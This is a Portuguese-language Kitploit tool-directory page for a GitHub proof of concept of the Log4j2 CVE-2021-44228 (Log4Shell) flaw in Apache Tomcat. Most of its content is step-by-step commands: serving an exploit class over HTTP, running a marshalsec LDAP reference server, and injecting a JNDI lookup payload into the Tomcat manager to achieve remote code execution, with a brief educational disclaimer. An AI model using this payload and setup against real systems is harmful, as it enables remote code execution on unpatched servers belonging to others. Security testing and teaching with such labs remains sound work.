Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
apache-tomcat-log4j — POC da vulnerabilidade CVE-2021-44228 do Log4j2 no Apache Tomcat | Kitploit
Ferramentas/GitHubGitHub/many-fac3d-g0d/apache-tomcat-log4j
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubmany-fac3d-g0d/apache-tomcat-log4j

apache-tomcat-log4j

POC da vulnerabilidade CVE-2021-44228 do Log4j2 no Apache Tomcat

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
5há 4 anosAinda não revisado

POC da Vulnerabilidade Log4j2 CVE-2021-44228 no Apache Tomcat

Pré-visualização

GIF

Configuração

Iniciar servidor Tomcat

root@kitploit:~
git clone
cd apache-tomcat-10.0.14/bin
startup.bat

Servir a classe de exploração

root@kitploit:~
cd exploit
py -m http.server 8888
root@kitploit:~
cd exploit
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Ataque

Insira ${jndi:ldap://127.0.0.1:1389/Exploit} no campo 'Caminho do arquivo de configuração XML' dentro do aplicativo gerenciador em http://localhost:8080/manager/html

A classe de exploração é carregada e o RCE é executado (o aplicativo Calculadora será aberto)

Aviso de Isenção

Este repositório é apenas uma POC feita para fins educacionais. O proprietário do repositório não se responsabiliza por quaisquer danos causados. Como nota moral, não seja mau.

Referências

Exploração LDAP https://github.com/mbechler/marshalsec

Baixar ferramenta